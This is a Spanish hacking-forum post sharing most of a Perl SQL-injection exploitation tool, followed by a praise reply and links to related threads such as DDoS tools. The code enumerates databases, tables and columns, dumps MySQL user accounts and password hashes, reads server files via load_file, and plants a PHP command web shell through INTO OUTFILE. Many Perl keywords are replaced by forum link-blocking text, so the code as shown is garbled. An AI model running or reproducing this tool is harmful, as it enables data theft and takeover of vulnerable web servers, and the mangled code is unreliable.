  312. You are not allowed to view links. Register or Login(my $table =<STDIN>);
  313. &schemacolumnsdb($_[0],$_[1],$db,$table,$save);
  314. &reload;
  315. }
  316. elsif ($opcion eq "6") {
  317. &mysqluser($_[0],$_[1],$save);
  318. &reload;
  319. }
  320. elsif ($opcion eq "13") {
  321. $t = "logs/webs/$save.txt";
  322. You are not allowed to view links. Register or Login("start $t");
  323. &reload;
  324. }
  325. elsif ($opcion eq "15") {
  326. &finish;
  327. }
  328. elsif ($opcion eq "14") {
  329. &head;
  330. &menu;
  331. }
  332. elsif ($opcion eq "7") {
  333. &tabfuzz($_[0],$_[1],$save);
  334. &reload;
  335. }
  336. elsif ($opcion eq "8") {
  337. You are not allowed to view links. Register or Login "\n\n[Tabla] : ";
  338. You are not allowed to view links. Register or Login(my $tab  = <STDIN>);
  339. &colfuzz($_[0],$_[1],$tab,$save);
  340. &reload;
  341. }
  342. elsif ($opcion eq "9") {
  343. &load($_[0],$_[1],$save);
  344. &reload;
  345. }
  346. elsif ($opcion eq "10") {
  347. You are not allowed to view links. Register or Login "\n\n[Table to dump] : ";
  348. You are not allowed to view links. Register or Login(my $tabla = <STDIN>);
  349. You are not allowed to view links. Register or Login "\n[Column 1] : ";
  350. You are not allowed to view links. Register or Login(my $col1 = <STDIN>);
  351. You are not allowed to view links. Register or Login "\n[Column 2] : ";
  352. You are not allowed to view links. Register or Login(my $col2 = <STDIN>);
  353. You are not allowed to view links. Register or Login "\n\n";
  354. &You are not allowed to view links. Register or Login($_[0],$col1,$col2,$tabla,$_[1],$save);
  355. &reload;
  356. }
  357. elsif ($opcion eq "11") {
  358. You are not allowed to view links. Register or Login "\n\n";
  359. &details($_[0],$_[1],$save);
  360. &reload;
  361. }
  362. elsif ($opcion eq "12") {
  363. You are not allowed to view links. Register or Login "\n\n[Full Path Discloure] : ";
  364. You are not allowed to view links. Register or Login(my $path = <STDIN>);
  365. &into($_[0],$_[1],$path,$save);
  366. &reload;
  367. }
  368. else {
  369. &reload;
  370. }
  371. }
  372.  
  373. sub schematables {
  374. $real = "1";
  375. my ($page,$bypass,$save) = @_;
  376. savefile($save.".txt","\n");
  377. You are not allowed to view links. Register or Login "\n";
  378. my $page1 = $page;
  379. ($pass1,$pass2) = &bypass($_[1]);
  380. savefile($save.".txt","[DB] : default");
  381. You are not allowed to view links. Register or Login "[+] Searching tables with schema\n\n";
  382. $page =~You are not allowed to view links. Register or Login/hackman/unhex(You are not allowed to view links. Register or Login(concat(char(82,65,84,83,88,80,68,79,87,78,49),table_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
  383. $page1=~You are not allowed to view links. Register or Login/hackman/unhex(You are not allowed to view links. Register or Login(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
  384. $code = toma($page1.$pass1."from".$pass1."information_schema.tables".$pass2);
  385. if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
  386. my $resto = $1;
  387. $total = $resto - 17;
  388. You are not allowed to view links. Register or Login "[+] Tables Length :  $total\n\n";
  389. savefile($save.".txt","[+] Searching tables with schema\n");
  390. savefile($save.".txt","[+] Tables Length :  $total\n");
  391. my $limit = $1;
  392. for my $limit(17..$limit) {
  393. $code1 = toma($page.$pass1."from".$pass1."information_schema.tables".$pass1."limit".$pass1.$limit.",1".$pass2);
  394. if ($code1 =~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
  395. my $table = $1;
  396. You are not allowed to view links. Register or Login $table;
  397. You are not allowed to view links. Register or Login "[Table $real Found : $table ]\n";
  398. savefile($save.".txt","[Table $real Found : $table ]");
  399. $real++;
  400. }}
  401. } else {
  402. You are not allowed to view links. Register or Login "\n[-] information_schema = ERROR\n";
  403. }        
  404. }
  405. sub reload {
  406. You are not allowed to view links. Register or Login "\n\n[+] Finish\n\n";
  407. <STDIN>;
  408. &head;
  409. &menu_options;
  410. }
  411.  
  412.  
  413. sub schemacolumns {
  414. my ($page,$bypass,$save,$table) = @_;
  415. my $page3 = $page;
  416. my $page4 = $page;
  417. savefile($save.".txt","\n");
  418. You are not allowed to view links. Register or Login "\n";
  419. ($pass1,$pass2) = &bypass($bypass);
  420. You are not allowed to view links. Register or Login "\n[DB] : default\n";
  421. savefile($save.".txt","[DB] : default");
  422. savefile($save.".txt","[Table] : $table\n");
  423. $page3=~You are not allowed to view links. Register or Login/hackman/unhex(You are not allowed to view links. Register or Login(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
  424. $code3 = toma($page3.$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name=char(".ascii($table).")".$pass2);
  425. if ($code3=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
  426. You are not allowed to view links. Register or Login "\n[Columns Length : $1 ]\n\n";
  427. savefile($save.".txt","[Columns Length : $1 ]\n");
  428. my $si = $1;
  429. You are not allowed to view links. Register or Login $si;
  430. $page4=~You are not allowed to view links. Register or Login/hackman/unhex(You are not allowed to view links. Register or Login(concat(char(82,65,84,83,88,80,68,79,87,78,49),column_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
  431. $real = "1";
  432. for my $limit2(0..$si) {
  433. $code4 = toma($page4.$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name=char(".ascii($table).")".$pass1."limit".$pass1.$limit2.",1".$pass2);
  434. if ($code4=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
  435. You are not allowed to view links. Register or Login "[Column $real] : $1\n";
  436. savefile($save.".txt","[Column $real] : $1");
  437. $real++;
  438. }}
  439. } else {
  440. You are not allowed to view links. Register or Login "\n[-] information_schema = ERROR\n";
  441. }}
  442.  
  443. sub schemadb {
  444. my ($page,$bypass,$save) = @_;
  445. my $page1 = $page;
  446. savefile($save.".txt","\n");
  447. You are not allowed to view links. Register or Login "\n\n[+] Searching DBS\n\n";
  448. ($pass1,$pass2) = &bypass($bypass);
  449. $page=~You are not allowed to view links. Register or Login/hackman/unhex(You are not allowed to view links. Register or Login(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
  450. $code = toma($page.$pass1."from".$pass1."information_schema.schemata");
  451. if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
  452. my $limita = $1;
  453. You are not allowed to view links. Register or Login "[+] Databases Length : $limita\n\n";
  454. savefile($save.".txt","[+] Databases Length : $limita\n");
  455. $page1=~You are not allowed to view links. Register or Login/hackman/unhex(You are not allowed to view links. Register or Login(concat(char(82,65,84,83,88,80,68,79,87,78,49),schema_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
  456. $real = "1";
  457. for my $limit(0..$limita) {
  458. $code = toma($page1.$pass1."from".$pass1."information_schema.schemata".$pass1."limit".$pass1.$limit.",1".$pass2);
  459. if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
  460. my $control = $1;
  461. if ($control ne "information_schema" and $control ne "mysql" and $control ne "phpmyadmin") {
  462. You are not allowed to view links. Register or Login "[Database $real Found] $control\n";
  463. savefile($save.".txt","[Database $real Found] : $control");
  464. $real++;
  465. }
  466. }
  467. }
  468. } else {
  469. You are not allowed to view links. Register or Login "[-] information_schema = ERROR\n";
  470. }
  471. }
  472.  
  473. sub schematablesdb {
  474. my $page = $_[0];
  475. my $db = $_[2];
  476. my $page1 = $page;
  477. savefile($_[3].".txt","\n");
  478. You are not allowed to view links. Register or Login "\n\n[+] Searching tables with DB $db\n\n";
  479. ($pass1,$pass2) = &bypass($_[1]);
  480. savefile($_[3].".txt","[DB] : $db");
  481. $page =~You are not allowed to view links. Register or Login/hackman/unhex(You are not allowed to view links. Register or Login(concat(char(82,65,84,83,88,80,68,79,87,78,49),table_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
  482. $page1=~You are not allowed to view links. Register or Login/hackman/unhex(You are not allowed to view links. Register or Login(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
  483. $code = toma($page1.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass2);
  484. #print $page.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass2."\n";
  485. if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {  
  486. You are not allowed to view links. Register or Login "[+] Tables Length :  $1\n\n";
  487. savefile($_[3].".txt","[+] Tables Length :  $1\n");
  488. my $limit = $1;
  489. $real = "1";
  490. for my $lim(0..$limit) {
  491. $code1 = toma($page.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass1."limit".$pass1.$lim.",1".$pass2);
  492. #print $page.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass1."limit".$pass1.$lim.",1".$pass2."\n";
  493. if ($code1 =~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
  494. my $table = $1;
  495. You are not allowed to view links. Register or Login $table;
  496. savefile($_[3].".txt","[Table $real Found : $table ]");
  497. You are not allowed to view links. Register or Login "[Table $real Found : $table ]\n";
  498. $real++;
  499. }}
  500. } else {
  501. You are not allowed to view links. Register or Login "\n[-] information_schema = ERROR\n";
  502. }}
  503.  
  504. sub schemacolumnsdb {
  505. my ($page,$bypass,$db,$table,$save) = @_;
  506. my $page3 = $page;
  507. my $page4 = $page;
  508. You are not allowed to view links. Register or Login "\n\n[+] Searching columns in table $table with DB $db\n\n";
  509. savefile($save.".txt","\n");
  510. ($pass1,$pass2) = &bypass($_[1]);
  511. savefile($save.".txt","\n[DB] : $db");
  512. savefile($save.".txt","[Table] : $table");
  513. $page3=~You are not allowed to view links. Register or Login/hackman/unhex(You are not allowed to view links. Register or Login(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
  514. $code3 = toma($page3.$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name=char(".ascii($table).")".$pass1."and".$pass1."table_schema=char(".ascii($db).")".$pass2);
  515. if ($code3=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
  516. You are not allowed to view links. Register or Login "\n[Columns length : $1 ]\n\n";
  517. savefile($save.".txt","[Columns length : $1 ]\n");
  518. my $si = $1;
  519. You are not allowed to view links. Register or Login $si;
  520. $page4=~You are not allowed to view links. Register or Login/hackman/unhex(You are not allowed to view links. Register or Login(concat(char(82,65,84,83,88,80,68,79,87,78,49),column_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
  521. $real = "1";
  522. for my $limit2(0..$si) {
  523. $code4 = toma($page4.$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name=char(".ascii($table).")".$pass1."and".$pass1."table_schema=char(".ascii($db).")".$pass1."limit".$pass1.$limit2.",1".$pass2);
  524. if ($code4=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
  525. You are not allowed to view links. Register or Login "[Column $real] : $1\n";
  526. savefile($save.".txt","[Column $real] : $1");
  527. $real++;
  528. }}
  529. } else {
  530. You are not allowed to view links. Register or Login "\n[-] information_schema = ERROR\n";
  531. }}
  532.  
  533. sub mysqluser {
  534. my ($page,$bypass,$save) = @_;
  535. my $cop = $page;
  536. my $cop1 = $page;
  537. savefile($save.".txt","\n");
  538. You are not allowed to view links. Register or Login "\n\n[+] Finding mysql.users\n";
  539. ($pass1,$pass2) = &bypass($bypass);
  540. $page =~You are not allowed to view links. Register or Login/hackman/concat(char(82,65,84,83,88,80,68,79,87,78,49))/;
  541. $code = toma($page.$pass1."from".$pass1."mysql.user".$pass2);
  542. if ($code=~/RATSXPDOWN/ig){
  543. $cop1 =~You are not allowed to view links. Register or Login/hackman/unhex(You are not allowed to view links. Register or Login(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
  544. $code1 = toma($cop1.$pass1."from".$pass1."mysql.user".$pass2);
  545. if ($code1=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
  546. You are not allowed to view links. Register or Login "\n\n[+] Users Found : $1\n\n";
  547. savefile($save.".txt","\n[+] Users mysql Found : $1\n");
  548. for my $limit(0..$1) {
  549. $cop =~You are not allowed to view links. Register or Login/hackman/unhex(You are not allowed to view links. Register or Login(concat(0x524154535850444f574e,Host,0x524154535850444f574e,User,0x524154535850444f574e,Password,0x524154535850444f574e)))/;
  550. $code = toma($cop.$pass1."from".$pass1."mysql.user".$pass1."limit".$pass1.$limit.",1".$pass2);
  551. if ($code=~/RATSXPDOWN(.*)RATSXPDOWN(.*)RATSXPDOWN(.*)RATSXPDOWN/ig) {
  552. You are not allowed to view links. Register or Login "[Host] : $1 [User] : $2 [Password] : $3\n";
  553. savefile($save.".txt","[Host] : $1 [User] : $2 [Password] : $3");
  554. } else {
  555. &reload;
  556. }}}
  557. } else {
  558. You are not allowed to view links. Register or Login "\n[-] mysql.user = ERROR\n";
  559. }}
  560.  
  561. sub tabfuzz {
  562. my $page = $_[0];
  563. ($pass1,$pass2) = &bypass($_[1]);
  564. $count = "0";
  565. savefile($_[2].".txt","\n");
  566. You are not allowed to view links. Register or Login "\n";
  567. if ($_[0] =~/(.*)hackman(.*)/g) {
  568. my $start = $1; my $end = $2;
  569. You are not allowed to view links. Register or Login "\n\n[+] Searching tables.....\n\n";
  570. for my $table(@buscar2) {
  571. You are not allowed to view links. Register or Login $table;
  572. $concat = "unhex(hex(concat(char(69,82,84,79,82,56,53,52))))";
  573. $injection = $start.$concat.$end.$pass1."from".$pass1.$table.$pass2;
  574. $code = toma($injection);
  575. if ($code =~/ERTOR854/g) {
  576. $count++;
  577. You are not allowed to view links. Register or Login "[Table Found] : $table\n";
  578. savefile($_[2].".txt","[Table Found] : $table");
  579. }}}
  580. if ($count eq "0") { You are not allowed to view links. Register or Login "[-] Not found any table\n";
  581. &reload;
  582. }
  583. }
  584.  
  585. sub colfuzz {
  586. my $page = $_[0];
  587. ($pass1,$pass2) = &bypass($_[1]);
  588. $count = "0";
  589. savefile($_[3].".txt","\n");
  590. You are not allowed to view links. Register or Login "\n";
  591. if ($_[0] =~/(.*)hackman(.*)/) {
  592. my $start = $1; my $end = $2;
  593. You are not allowed to view links. Register or Login "[+] Searching columns for the table $_[2]...\n\n";
  594. savefile($_[3].".txt","[Table] : $_[2]");
  595. for my $columns(@buscar1) {
  596. You are not allowed to view links. Register or Login $columns;
  597. $concat = "unhex(hex(concat(char(69,82,84,79,82,56,53,52),$columns,char(69,82,84,79,82,56,53,52))))";
  598. $code = toma($start.$concat.$end.$pass1."from".$pass1.$_[2].$pass2);
  599. if ($code =~/ERTOR854/g) {
  600. You are not allowed to view links. Register or Login "[Column] : $columns\n";
  601. savefile($_[3].".txt","[Column Found] : $columns");
  602. }}
  603. } else {
  604. You are not allowed to view links. Register or Login "\n[Example] : $0 http://127.0.0.1/tester/sql.php?id=-1+union+select+hackman,2,3 hackers\n\n"; &copyright;
  605. }
  606. }
  607.  
  608. sub load {
  609. savefile($_[2].".txt","\n");
  610. You are not allowed to view links. Register or Login "\n";
  611. ($pass1,$pass2) = &bypass($_[1]);
  612. if ($_[0] =~/(.*)hackman(.*)/g) {
  613. You are not allowed to view links. Register or Login "\n[+] Searching files with load_file...\n\n\n";
  614. my $start = $1; my $end = $2;
  615. for my $file(@buscar3) {
  616. You are not allowed to view links. Register or Login $file;
  617. $concat = "unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(".encode($file)."),char(69,82,84,79,82,56,53,52))))";
  618. $code = toma($start.$concat.$end.$pass2);
  619. if ($code =~/ERTOR854(.*)ERTOR854/g) {
  620. You are not allowed to view links. Register or Login "[File Found] : $file\n";
  621. You are not allowed to view links. Register or Login "\n[Source Start]\n\n";
  622. You are not allowed to view links. Register or Login $1;
  623. You are not allowed to view links. Register or Login "\n\n[Source End]\n\n";
  624. savefile($_[2].".txt","[File Found] : $file");
  625. savefile($_[2].".txt","\n[Source Start]\n");
  626. savefile($_[2].".txt","$1");
  627. savefile($_[2].".txt","\n[Source End]\n");
  628. }}}}
  629.  
  630. sub You are not allowed to view links. Register or Login {
  631. savefile($_[5].".txt","\n");
  632. You are not allowed to view links. Register or Login "\n";
  633. my $page = $_[0];
  634. ($pass1,$pass2) = &bypass($_[4]);
  635. if ($page=~/(.*)hackman(.*)/){
  636. my $start = $1;
  637. my $end = $2;
  638. You are not allowed to view links. Register or Login "[+] Extracting values...\n\n";
  639. $concatx = "unhex(hex(concat(char(69,82,84,79,82,56,53,52),count($_[1]),char(69,82,84,79,82,56,53,52))))";
  640. $val_code = toma($start.$concatx.$end.$pass1."from".$pass1.$_[3].$pass2);
  641. $concat = "unhex(hex(concat(char(69,82,84,79,82,56,53,52),$_[1],char(69,82,84,79,82,56,53,52),$_[2],char(69,82,84,79,82,56,53,52))))";
  642. if ($val_code=~/ERTOR854(.*)ERTOR854/ig) {
  643. $tota = $1;
  644. You are not allowed to view links. Register or Login "[+] Table : $_[3]\n";
  645. You are not allowed to view links. Register or Login "[+] Length of the rows : $tota\n\n";
  646. You are not allowed to view links. Register or Login "[$_[1]] [$_[2]]\n\n";
  647. savefile($_[5].".txt","[Table] : $_[3]");
  648. savefile($_[5].".txt","[+] Length of the rows: $tota\n");
  649. savefile($_[5].".txt","[$_[1]] [$_[2]]\n");
  650. for my $limit(0..$tota) {
  651. You are not allowed to view links. Register or Login $limit;
  652. $injection = toma($start.$concat.$end.$pass1."from".$pass1.$_[3].$pass1."limit".$pass1.$limit.",1".$pass2);
  653. if ($injection=~/ERTOR854(.*)ERTOR854(.*)ERTOR854/ig) {
  654. savefile($_[5].".txt","[$_[1]] : $1   [$_[2]] : $2");
  655. You are not allowed to view links. Register or Login "[$_[1]] : $1   [$_[2]] : $2\n";
  656. } else {
  657. You are not allowed to view links. Register or Login "\n\n[+] Extracting Finish\n";
  658. &reload;
  659. }
  660. }
  661. } else {
  662. You are not allowed to view links. Register or Login "[-] Not Found any DATA\n\n";
  663. }}}
  664.  
  665. sub encode {
  666. my $string = $_[0];
  667. $hex = '0x';
  668. for (You are not allowed to view links. Register or Login //,$string) {
  669. $hex .= You are not allowed to view links. Register or Login "%x", You are not allowed to view links. Register or Login;
  670. }You are not allowed to view links. Register or Login $hex;}
  671.  
  672. sub decode {
  673. $_[0] =~ s/^0x//;
  674. $encode = You are not allowed to view links. Register or Login You are not allowed to view links. Register or Login[], You are not allowed to view links. Register or Login { You are not allowed to view links. Register or Login You are not allowed to view links. Register or Login } $_[0] =~ /../g;
  675. You are not allowed to view links. Register or Login $encode;
  676. }
  677.  
  678. sub finish {
  679. &copyright;
  680. <STDIN>;
  681. You are not allowed to view links. Register or Login(1);
  682. }
  683.  
  684.  
  685. sub into {
  686. You are not allowed to view links. Register or Login "\n\n[Status] : Injecting a SQLI for create a shell\n\n";
  687. my ($page,$bypass,$dir,$save) = @_;
  688. savefile($save.".txt","\n");
  689. You are not allowed to view links. Register or Login "\n";
  690. ($pass1,$pass2) = &bypass($bypass);
  691. my ($scheme, $auth, $path, $query, $frag)  = uri_split($page);
  692. if ($path=~/\/(.*)$/) {        
  693. my $path1 = $1;
  694. my $path2 = $path1;
  695. $path2 =~You are not allowed to view links. Register or Login/$1//;
  696. $dir =~You are not allowed to view links. Register or Login/$path1//ig;
  697. $shell = $dir."/"."shell.php";
  698. if ($page =~/(.*)hackman(.*)/ig) {
  699. my  ($start,$end) = ($1,$2);
  700. $code = toma($start."0x3c7469746c653e4d696e69205368656c6c20427920446f6464793c2f7469746c653e3c3f7068702069662028697373657428245f4745545b27636d64275d2929207b2073797374656d28245f4745545b27636d64275d293b7d3f3e".$end.$pass1."into".$pass1."outfile".$pass1."'".$shell."'".$pass2);
  701. $code1 = toma("http://".$auth."/".$path2."/"."shell.php");
  702. if ($code1=~/Mini Shell By Doddy/ig) {
  703. You are not allowed to view links. Register or Login "[shell up] : http://".$auth."/".$path2."/"."shell.php"."\a\a";
  704. savefile($save.".txt","[shell up] : http://".$auth."/".$path2."/"."shell.php");
  705. } else {
  706. You are not allowed to view links. Register or Login "[shell] : Not Found\n";
  707. }
  708. }
  709. }
  710. }
  711.  
  712. #blog : doddy-hackman.blogspot.com
  713. #contact : lepuke[at]hotmail[Com]
  714. #The end
  715.  
  716.  

Si lo quieren descargar desde sourceforge

Código: You are not allowed to view links. Register or Login
https://sourceforge.net/projects/k0bra/
« Última modificación: Marzo 14, 2015, 10:16:48 am por Expermicid »

Desconectado SPELINAX

  • *
  • Underc0der
  • Mensajes: 25
  • Actividad:
    0%
  • Reputación 0
  • Un clásico carder de los 90's (ci)
    • Ver Perfil
    • YouTube Channel
    • Email
« Respuesta #1 en: Noviembre 22, 2011, 04:45:58 pm »
Que gran programador que sos y nadie et lo agradece saludos que te vaya muy bien man.
[Ð.Ţ.Ρ] [2007] †.: SǷ£ĻΐИΩХ :.† [2007] [Ð.Ţ.Ρ]


 

¿Te gustó el post? COMPARTILO!



Tutorial perl desde cero By: Black Poision & Painboy

Iniciado por ProcessKill

Respuestas: 2
Vistas: 3003
Último mensaje Septiembre 02, 2011, 09:43:36 pm
por blozzter
[Perl] Verificando si es root para correr un script

Iniciado por c1st

Respuestas: 1
Vistas: 1409
Último mensaje Octubre 07, 2012, 06:01:39 pm
por ANTRAX
DoSing IP 1.0 - [Creado por SkillmaX] + Source [PERL]

Iniciado por SkillmaX

Respuestas: 0
Vistas: 1329
Último mensaje Julio 04, 2010, 10:14:31 am
por SkillmaX
[Perl] Iframe DDos Attack Tool

Iniciado por BigBear

Respuestas: 0
Vistas: 1236
Último mensaje Julio 03, 2011, 10:06:45 pm
por BigBear
[Perl] Search in google for scan SQLI

Iniciado por BigBear

Respuestas: 0
Vistas: 1178
Último mensaje Julio 03, 2011, 09:49:49 pm
por BigBear